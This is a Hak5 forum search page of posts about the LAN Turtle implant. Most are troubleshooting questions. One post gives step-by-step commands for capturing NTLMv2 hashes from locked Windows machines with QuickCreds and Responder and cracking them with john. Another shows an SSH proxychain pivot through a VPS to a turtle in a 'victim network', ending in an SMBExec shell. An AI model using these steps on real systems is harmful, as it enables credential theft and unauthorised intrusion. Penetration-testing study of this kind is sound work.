Jump to content

Search the Community

Showing results for tags 'lan turtle'.



More search options

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Talk
    • Everything Else
    • Gaming
    • Questions
    • Business and Enterprise IT
    • Security
    • Hacks & Mods
    • Applications & Coding
    • Trading Post
  • WiFi Pineapple
    • WiFi Pineapple TETRA
    • WiFi Pineapple NANO
    • WiFi Pineapple Mark V
    • WiFi Pineapple Mark IV
    • Pineapple Modules
    • WiFi Pineapples Mark I, II, III
  • Hak5 Gear
    • Hak5 Cloud C²
    • Plunder Bug
    • Bash Bunny
    • Signal Owl
    • USB Rubber Ducky
    • Packet Squirrel
    • LAN Turtle
    • Screen Crab
    • Shark Jack
    • Key Croc
  • O.MG (Mischief Gadgets)
    • O.MG Cable
    • O.MG DemonSeed EDU
  • Hak5 Shows
  • Community
    • Forums and Wiki
    • #Hak5
  • Projects
    • SDR - Software Defined Radio
    • Community Projects
    • Interceptor
    • USB Hacks
    • USB Multipass
    • Pandora Timeshifting

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


AIM


MSN


Website URL


ICQ


Yahoo


Jabber


Skype


Location


Interests


Enter a five letter word.

Found 17 results

  1. After much chagrin and googling, we found that QuickCreds will not work on the lan turtle because of disk space issues. Here's our fix! (we take no responsibility if you break something/somebody. Only hack when you have prior approval and authorization!) Factory reset, or push the turtle-5.bin firmware to reset (probably need to upgrade to v5 anyway). This makes sure you are set to base. YMMV. Open the lan turtle, push and hold the reset button for at least 5 seconds after plugging it into the machine ssh in to 172.16.84.1, sh3llz, change password Update the modules list Only install QuickCreds for now, so we have enough space Select QuickCreds and configure Let it install it's dependencies You can now set QuickCreds to 'Enable' so that it will start at boot DO NOT REBOOT YET! At this point, we're going to exit and git clone the responder package DO NOT INSTALL RESPONDER FROM THE TURTLE MODULES LIST ITSELF Exit 'turtle' back to a basic root shell Git clone the Responder package first to /tmp since there is plenty of space. git clone git://github.com/lgandx/Responder /tmp/Responder BUT DON'T REBOOT YET, CAUSE YOU'LL LOSE EVERYTHING IN /tmp du -sh /tmp/Responder 3.8M rm -rf /tmp/Responder/.git rm -rf /tmp/Responder/tools/MultiRelay/ du -sh /tmp/Responder 450.5k We also want to remove the git package as it takes up >1MB of space. QuickCreds installs it /only/ to git the Responder package 😕 opkg remove git df -h 1.2M available on / Move the Responder package back to /etc/turtle/ for QuckCreds to find it mv /tmp/Responder/ /etc/turtle/ df -h 1.1M still available on / now (w00t) The QuickCreds module is hardcoded to use br-lan as the interface. This doesn't exist, so we need to change it to eth0. Another 😕 sed -i 's/br-lan/eth0/' /etc/turtle/modules/QuickCreds You should now have at least 1MB of storage on / and plenty of space for /root/loot to write to, as well as have Responder available for QuickCreds Pop the turtle in a Windows system and wait about 30 seconds until the amber light goes solid, CREDS!!! Copy and paste the hash from /root/loot/#/HTTP-NTLMv2-172.16.84.127.txt Paste into a hash file and send it to john with a wordlist john hash.txt --wordlist=wordlist.txt Testing shows this works whether the laptop is locked or not locked. These hashes can not be replayed, only cracked. You still have plenty of space to return to the turtle shell and install any other modules you need at this point. You may need git for something else, but probably not enough space. This set up is for the "Grab creds from a locked Workstation" scenario. You may need MultiRelay for something else...? Not needed for QuickCreds. ENJOY!
  2. Can anyone recommend a carrier for the using the 3G LAN ?? I am currently a T-Mobile customer and could add a line but wanted to make sure I explored all options before just adding a line for basically data only. Thanks for all the help!
  3. Hi guys, If you're getting the error: urlsnarf: br-lan: No such device exists (SIOCGIFHWADDR: No such device) Fear not it's an easy fix. You just need to swap out br-lan in the module code for eth0. Here's a foolproof guide on how to do that: 1) Load up your LAN Turtle, then 'Esc' at the main menu to take you to the Turtle terminal. 2) Type the following to go to modules cd /etc/turtle/modules/ 3) Use the following command to edit the urlsnarf module nano urlsnarf 4) Hit Ctrl + \ and type br-lan hit enter then type eth0 hit enter again and then press A to apply the replacement to all instances of 'br-lan' in the code 5) Hit Ctrl + O to save the module 6) You're done! Ctrl + X to exit. urlsnarf should now successfully read any non-secure web-traffic...remember HTTPS site traffic will not show here!
  4. Hello, I just received my first LanTurtle and i wanted to test it with the quickcreds module, however when the modul is loaded en I plug it in a Logged on machine, the orange light keeps blinking and there are no log files what so ever, the module script keeps making the number folders but they are all empty. and the responder.log only states -->> Starting attack...
  5. Got a question im wondering about. Lest say i plug a Turtle on an Enterprise Network. The kind that have Active Directory and Cisco Routers, That filter devices by Mac address and not allowing machines that are not approved to connect and set off Unwanted Alarms. Will a Turtle survive or become Turtle soup?! I didn't undertood exactly the way it work. Does it have its own nic to get an ip and create vpn or share the ip of the machine and create vpn with that machine. In an enterprise Network its better to use 3G Turtle right? If i don't have outside network or its filtered. If the Turtle SD does have a nic and wont work(get blocked).
  6. I've set up an OpenVPN Server on my VPS with OpenVPN Road Warrior Installer. How does one configure the client.ovpn to act as a gateway? Like mentioned in this Youtube Tutorial. I know how to configure this in OpenVPN Acces Server, but I don't want to replace the Road Warrior Installation with OpenVPN AS. Thanks in advance, Dan
  7. Received my lan turtle awhile back. Just found time to play with it. I am running windows 10. First item: The lan turtle seems very loose in every usb port I have tried it. I have tried it in several different computers and it seems to jiggle and does not fit tight.Second item: None of my windows computers will recognize it. I was able to use putty to ssh into it and change the password but cannot update it. I attach a ethernet cable to it and click update and get the message "must be connected to internet to update" What am I doing wrong? I am a noob at this.
  8. Hello, I just received my first LanTurtle and i wanted to test it with the quickcreds module, however when the modul is loaded en I plug it in a Logged on machine, the orange light keeps blinking and there are no log files what so ever, the module script keeps making the number folders but they are all empty. and the responder.log only states -->> Starting attack...
  9. I have followed the wiki steps for factory resetting the Lan Turtle ( https://lanturtle.com/wiki/#!index.md ) In addition to this, I have followed this fellow who seems to have had the same problem. (And fixed it) However, I am having absolutely no luck reaching the internal webserver of the lan turtle. Once I type in 192.168.1.1 into my web browser, it hangs for approximately 2 seconds, and states that there is no internet. If someone could help me asap, it would be greatly appreciated, as I need it for a demonstration this week. Thank you for your time. PS. If it helps, I am on the Parrot operating system, although I do have both windows and default debian installed as well. (I've tried all 3 OSs, and still no luck.)
  10. Hallo, I have one question about the Lan Turtle. When i connect the Lan turtle in a PC from a "big" network so the lan turtle has acces to the network, doesnt it? When i want to start a MITM attack, have the target device only be in the same network or should i connect the lan turtle directly to the targetet device? So for example i plug in the lan turtle in "PC206" and i want to attack the "PC259" does it works or should i plug in the turtle in PC259? I Hope you understand my question :) Thanks in advice, Simon PS: sorry for my bad englisch, im not a native speaker
  11. I am a security tester and I have been hired at a public school. What I'm wanting to achieve is to be able to access the school network from my home. I understand on connecting my computer and the turtle to a vpn. Example: «My home computer» > VPN > lan turtle > school computer > «school network» Basically the goal is to plug the turtle (with the right modules) into a computer and plug the Ethernet cord into the lan turtle. Then go home and access the network and do what I need to do. Example: Ethernet > lan turtle > school computer > school network The questions are: 1. Does the host computer (the one with the turtle plugged in) need to be on? 2. Does the host computer being logged off matter? 3. Would my theory work? 4. How could I get a list of every user on the network (school systems are tricky, any user can be Logged in on any computer)? 5. Will it just be that school network or will I also access the entire county school network?
  12. Hi, I purchased the lan turtle this May from Edutech Hakshop, and was on the side until some days ago when I decided to play with it. Unfortunately I discovered that I cannot SSH to it, with or without the LAN cable on the other side. I tried both my Macbook and in WIN10 through a Virtual Box machine but no luck, even though I can see the Realtek USB device in Virtual Box. I would like to ask if this needs to be replaced, or you suggest me to try a "Factory Reset" first? Thanks
  13. Received my LAN Turtle today and have been hacking away for past hour. However, when I tried to set up autossh, I began seeing filesystem errors. It seems file system is full and has no more disk space. I uninstalled all modules and still continue to see the errors. Here is some output for your kind reading :) root@turtle:~# ssh -ash: ssh: Input/output error root@turtle:~# dmesg | tail [ 25.800000] SQUASHFS error: xz_dec_run error, data probably corrupt [ 25.800000] SQUASHFS error: squashfs_read_data failed to read block 0x300242 [ 25.810000] SQUASHFS error: Unable to read data cache entry [300242] [ 25.820000] SQUASHFS error: Unable to read page, block 300242, size 1a790 [ 25.820000] SQUASHFS error: Unable to read data cache entry [300242] [ 25.830000] SQUASHFS error: Unable to read page, block 300242, size 1a790 [ 25.840000] SQUASHFS error: Unable to read data cache entry [300242] [ 25.840000] SQUASHFS error: Unable to read page, block 300242, size 1a790 [ 25.850000] SQUASHFS error: Unable to read data cache entry [300242] [ 25.860000] SQUASHFS error: Unable to read page, block 300242, size 1a790 [ 25.860000] SQUASHFS error: Unable to read data cache entry [300242] root@turtle:~# df -h Filesystem Size Used Available Use% Mounted on rootfs 4.6M 4.5M 104.0K 98% / /dev/root 10.3M 10.3M 0 100% /rom tmpfs 30.0M 92.0K 29.9M 0% /tmp /dev/mtdblock3 4.6M 4.5M 104.0K 98% /overlay overlayfs:/overlay 4.6M 4.5M 104.0K 98% / tmpfs 512.0K 0 512.0K 0% /dev Any suggestions folks? Thanks.
  14. Hi all! Just wanted to share something that might help other Lan Turtlers out there. One of the things I wanted to do with my lan turtle was to pivot my tools from my local box through the turtle. One such way is to use proxychains to proxy your local tools through your VPS in the cloud, and out through your turtle. My setup: [Local Kali box] --> (Router) --> [VPS] --> [turtle, which is inside victim network] I ran into trouble trying to figure out how to setup an SSH proxychain to it...found this article which worked right away: https://superuser.com/questions/332850/ssh-as-socks-proxy-through-multiple-hosts I used the first line, which was this command: ssh -f -N -D $PORT -oProxyCommand="ssh -W %h:%p machine-b" machine-c Here, machine-b would be the username@ip_of_VPS_in_cloud and machine-c would be the turtle, which should be root@localhost -p 2222 By replacing the "$PORT" with whatever you want (I used 9050, the default in the proxychains.conf), it would work flawlessly. Basically, what we are doing here is creating a Socks Proxy through SSH that goes through our VPS in the cloud, and then logs into the turtle (which already connects back to that VPS, through AutoSSH). With this tunnel, all you need to do is open up your proxychains.conf (/etc/proxychains.conf) and edit the last line to reflect the port you used. After that, you are all set! In Kali, just prepend "proxychains" before the tool you want to use.....for example! I wanted to be able to use Veil-Pillage from my local Kali box to get a SMBExec shell (because I already had credentials). So, by setting up the tunnel above, I ran root@kali#proxychains ./Veil-Pillage Which would take me to dialogue screen, I chose number 25, set my target (which was 10.13.37.27, a win7 VM) and my creds, and just hit ran! Veil-Pillage: post-explotation framework | [Version]: 1.1.2 ========================================================================= [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework ========================================================================= [*] Executing module: Smbexec Shell... [*] Type 'exit' to exit the shell Trying protocol 445/SMB... Creating service SystemDiag... |S-chain|-<>-***.***.***.***-<><>-10.13.37.27:445-<><>-OK [!] Launching semi-interactive shell - Careful what you execute C:\Windows\system32> And there you have it!! I thought this should be useful for everyone out there. Another way of doing it is to use your metasploit/armitage instance in the VPS, use the meterpreter module, setup the Socks4 proxy, and then setup proxychains to reflect your VPS instance. Don't forget to add route! Let me know your thoughts! TL;DR: SSH socks proxy -- root@kali#ssh -f -N -D $PORT -oProxyCommand="ssh -W %h:%p VPS-in-cloud" turtle-in-VPS then change proxychains.conf, then "proxychains tool"
  15. Hey guys - When I try to run the nmap scan, I'm not able to configure a log location. I select the "Log - Choose Log Location" from the turtle gui, but I don't go to another screen, it just flashes the same screen. I setup sshfs just fine so I don't clog up the internal storage on the device, so ideally I'd point the nmap to /sshfs. Any ideas? Known bug? Anyone else able to reproduce this? Thanks in advance telot
  16. Hi, Sometime a go I came across this talk from DefCon 19: The guy mentions the raspberry pi, but the turtle should be able to do this with minor modifications to the bridging code? Possibly have a flag on the code of whether to enable / disable the patch? The rest of the code is actually documented as a script on a pdf as well. Tim
  17. I got my turtle yesterday, and playing around in the cli I've found arpspoof, tcpdump, dsniff, hping3, and ettercap. All ripe for module-making! I'm sure I'm missing some others - what nuggets of goodness have you guys found? This turtle must be mcdonalds, cause I'm lovin' it! telot
×
×
  • Create New...